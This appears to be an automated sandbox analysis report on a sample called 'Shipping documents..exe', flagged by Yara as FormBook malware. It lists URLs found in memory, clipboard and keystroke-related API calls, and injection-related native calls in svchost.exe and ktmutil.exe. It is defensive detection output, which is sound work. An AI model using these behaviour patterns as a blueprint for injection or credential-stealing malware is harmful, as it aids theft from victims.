                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camp
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://stzqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/piensasolutions
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wmqqb.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wqxs.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.clarity.ms/tag/
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000500C000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000006.00000002.4571566936.00000000060C0000.00000004.00000800.00020000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.000000000491C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: ktmutil.exe, 00000006.00000003.2634284897.0000000007B2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/certificado-ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campa
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=we
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dom
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=host
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaign
                Source: ktmutil.exe, 00000006.00000002.4569488926.0000000004CE8000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.00000000045F8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensa
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://xuaxs.com
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://yqqb.xyz
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zeqb.info
                Source: ktmutil.exe, 00000006.00000002.4569488926.000000000519E000.00000004.10000000.00040000.00000000.sdmp, FuFneNIzDsF.exe, 00000008.00000002.4569203486.0000000004AAE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://znqb.info
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4571453200.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4568813272.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2433270626.0000000003560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4568990359.00000000030C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2432620170.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4568829458.00000000051E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4559476128.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2437565309.0000000006600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Shipping documents..exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C883 NtClose,2_2_0042C883
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B60 NtClose,LdrInitializeThunk,2_2_03772B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03772DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03772C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037735C0 NtCreateMutant,LdrInitializeThunk,2_2_037735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774340 NtSetContextThread,2_2_03774340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03774650 NtSuspendThread,2_2_03774650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BF0 NtAllocateVirtualMemory,2_2_03772BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BE0 NtQueryValueKey,2_2_03772BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772BA0 NtEnumerateValueKey,2_2_03772BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772B80 NtQueryInformationFile,2_2_03772B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AF0 NtWriteFile,2_2_03772AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AD0 NtReadFile,2_2_03772AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772AB0 NtWaitForSingleObject,2_2_03772AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F60 NtCreateProcessEx,2_2_03772F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F30 NtCreateSection,2_2_03772F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FE0 NtCreateFile,2_2_03772FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FB0 NtResumeThread,2_2_03772FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772FA0 NtQuerySection,2_2_03772FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772F90 NtProtectVirtualMemory,2_2_03772F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E30 NtWriteVirtualMemory,2_2_03772E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EE0 NtQueueApcThread,2_2_03772EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772EA0 NtAdjustPrivilegesToken,2_2_03772EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772E80 NtReadVirtualMemory,2_2_03772E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D30 NtUnmapViewOfSection,2_2_03772D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D10 NtMapViewOfSection,2_2_03772D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772D00 NtSetInformationFile,2_2_03772D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DD0 NtDelayExecution,2_2_03772DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772DB0 NtEnumerateKey,2_2_03772DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C60 NtCreateKey,2_2_03772C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772C00 NtQueryInformationProcess,2_2_03772C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CF0 NtOpenProcess,2_2_03772CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CC0 NtQueryVirtualMemory,2_2_03772CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772CA0 NtQueryInformationToken,2_2_03772CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773010 NtOpenDirectoryObject,2_2_03773010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773090 NtSetValueKey,2_2_03773090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037739B0 NtGetContextThread,2_2_037739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D70 NtOpenThread,2_2_03773D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03773D10 NtOpenProcessToken,2_2_03773D10
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03394340 NtSetContextThread,LdrInitializeThunk,6_2_03394340
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03394650 NtSuspendThread,LdrInitializeThunk,6_2_03394650
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392B60 NtClose,LdrInitializeThunk,6_2_03392B60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03392BA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03392BF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03392BE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392AF0 NtWriteFile,LdrInitializeThunk,6_2_03392AF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392AD0 NtReadFile,LdrInitializeThunk,6_2_03392AD0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392F30 NtCreateSection,LdrInitializeThunk,6_2_03392F30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392FB0 NtResumeThread,LdrInitializeThunk,6_2_03392FB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392FE0 NtCreateFile,LdrInitializeThunk,6_2_03392FE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03392E80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03392EE0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03392D30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03392D10
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03392DF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392DD0 NtDelayExecution,LdrInitializeThunk,6_2_03392DD0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03392C70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392C60 NtCreateKey,LdrInitializeThunk,6_2_03392C60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03392CA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033935C0 NtCreateMutant,LdrInitializeThunk,6_2_033935C0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_033939B0 NtGetContextThread,LdrInitializeThunk,6_2_033939B0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392B80 NtQueryInformationFile,6_2_03392B80
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392AB0 NtWaitForSingleObject,6_2_03392AB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392F60 NtCreateProcessEx,6_2_03392F60
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392FA0 NtQuerySection,6_2_03392FA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392F90 NtProtectVirtualMemory,6_2_03392F90
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392E30 NtWriteVirtualMemory,6_2_03392E30
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392EA0 NtAdjustPrivilegesToken,6_2_03392EA0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392D00 NtSetInformationFile,6_2_03392D00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392DB0 NtEnumerateKey,6_2_03392DB0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392C00 NtQueryInformationProcess,6_2_03392C00
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392CF0 NtOpenProcess,6_2_03392CF0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03392CC0 NtQueryVirtualMemory,6_2_03392CC0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03393010 NtOpenDirectoryObject,6_2_03393010
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03393090 NtSetValueKey,6_2_03393090
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03393D10 NtOpenProcessToken,6_2_03393D10
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_03393D70 NtOpenThread,6_2_03393D70
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_029A9280 NtCreateFile,6_2_029A9280
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_029A93F0 NtReadFile,6_2_029A93F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_029A9700 NtAllocateVirtualMemory,6_2_029A9700
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_029A94F0 NtDeleteFile,6_2_029A94F0
                Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 6_2_029A95A0 NtClose,6_2_029A95A0
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004096A00_2_004096A0
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0042200C0_2_0042200C
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0041A2170_2_0041A217
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004122160_2_00412216
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0042435D0_2_0042435D
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004033C00_2_004033C0
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044F4300_2_0044F430
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004125E80_2_004125E8
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044663B0_2_0044663B
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004138010_2_00413801
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0042096F0_2_0042096F
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004129D00_2_004129D0
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_004119E30_2_004119E3
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0041C9AE0_2_0041C9AE
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0047EA6F0_2_0047EA6F
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0040FA100_2_0040FA10
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044EB5F0_2_0044EB5F
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00423C810_2_00423C81
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00411E780_2_00411E78
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00442E0C0_2_00442E0C
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00420EC00_2_00420EC0
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_0044CF170_2_0044CF17
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_00444FD20_2_00444FD2
                Source: C:\Users\user\Desktop\Shipping documents..exeCode function: 0_2_03EB62780_2_03EB6278
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004188F32_2_004188F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030602_2_00403060
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004010C02_2_004010C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101CA2_2_004101CA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101D32_2_004101D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012002_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040235D2_2_0040235D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023602_2_00402360
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416B332_2_00416B33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103F32_2_004103F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B952_2_00402B95
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402BA02_2_00402BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E46B2_2_0040E46B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4732_2_0040E473
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EEA32_2_0042EEA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FA3522_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038003E62_2_038003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E3F02_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E02742_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C02C02_2_037C02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C81582_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038001AA2_2_038001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA1182_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037301002_2_03730100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F81CC2_2_037F81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F41A22_2_037F41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D20002_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037407702_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037647502_2_03764750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373C7C02_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C6E02_2_0375C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038005912_2_03800591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037405352_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F24462_2_037F2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E44202_2_037E4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EE4F62_2_037EE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FAB402_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F6BD72_2_037F6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373EA802_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037569622_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380A9A62_2_0380A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037429A02_2_037429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374A8402_2_0374A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037428402_2_03742840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E8F02_2_0376E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037268B82_2_037268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4F402_2_037B4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760F302_2_03760F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E2F302_2_037E2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03782F282_2_03782F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374CFE02_2_0374CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732FC82_2_03732FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BEFA02_2_037BEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740E592_2_03740E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEE262_2_037FEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FEEDB2_2_037FEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03752E902_2_03752E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FCE932_2_037FCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DCD1F2_2_037DCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374AD002_2_0374AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373ADE02_2_0373ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03758DBF2_2_03758DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740C002_2_03740C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730CF22_2_03730CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E0CB52_2_037E0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372D34C2_2_0372D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F132D2_2_037F132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0378739A2_2_0378739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037E12ED2_2_037E12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375B2C02_2_0375B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037452A02_2_037452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372F1722_2_0372F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377516C2_2_0377516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374B1B02_2_0374B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380B16B2_2_0380B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F70E92_2_037F70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF0E02_2_037FF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EF0CC2_2_037EF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037470C02_2_037470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037FF7B02_2_037FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037856302_2_03785630
